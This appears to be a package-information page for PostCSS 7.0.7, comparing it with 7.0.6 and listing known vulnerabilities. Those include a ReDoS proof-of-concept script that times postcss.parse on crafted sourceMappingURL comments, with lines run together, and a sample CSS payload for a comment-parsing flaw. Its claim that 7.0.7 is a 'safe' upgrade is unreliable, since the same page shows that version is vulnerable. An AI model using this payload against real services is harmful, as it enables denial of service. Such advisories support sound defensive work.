PostCSS version 7.0.7 is a minor release in the 7.x branch of this popular tool for transforming CSS with JavaScript plugins. Building upon the solid foundation established in version 7.0.6, this iteration introduces incremental improvements and refinements aimed at enhancing the developer experience. Both versions share fundamental characteristics: they offer a robust framework for manipulating CSS, leveraging a plugin ecosystem to enable tasks like autoprefixing, future CSS syntax adoption, and code optimization. Key dependencies, including chalk for colorful terminal output, source-map for easier debugging and supports-color for color support detection remain consistent between the two versions.
The core functionality related to CSS parsing, AST manipulation, and plugin integration remains largely the same, ensuring a smooth transition for existing users. The most notable difference lies within the dist object, where unpackedSize sees a modest increase from 592637 in 7.0.6 to 597437 in 7.0.7, and the releaseDate is updated. This increment in size typically suggests bug fixes, performance optimizations or small feature enhancements within the core library or its dependencies. For developers, upgrading to 7.0.7 represents a low-risk proposition, promising potential stability improvements and refinements without introducing breaking changes. Given the shared dependency versions, the upgrade is unlikely to cause conflicts with existing projects using PostCSS plugins. It's always recommended to review release notes or changelogs for detailed specifics about included fixes but in general it appears to be a safe and worthwhile update.
All the vulnerabilities related to the version 7.0.7 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.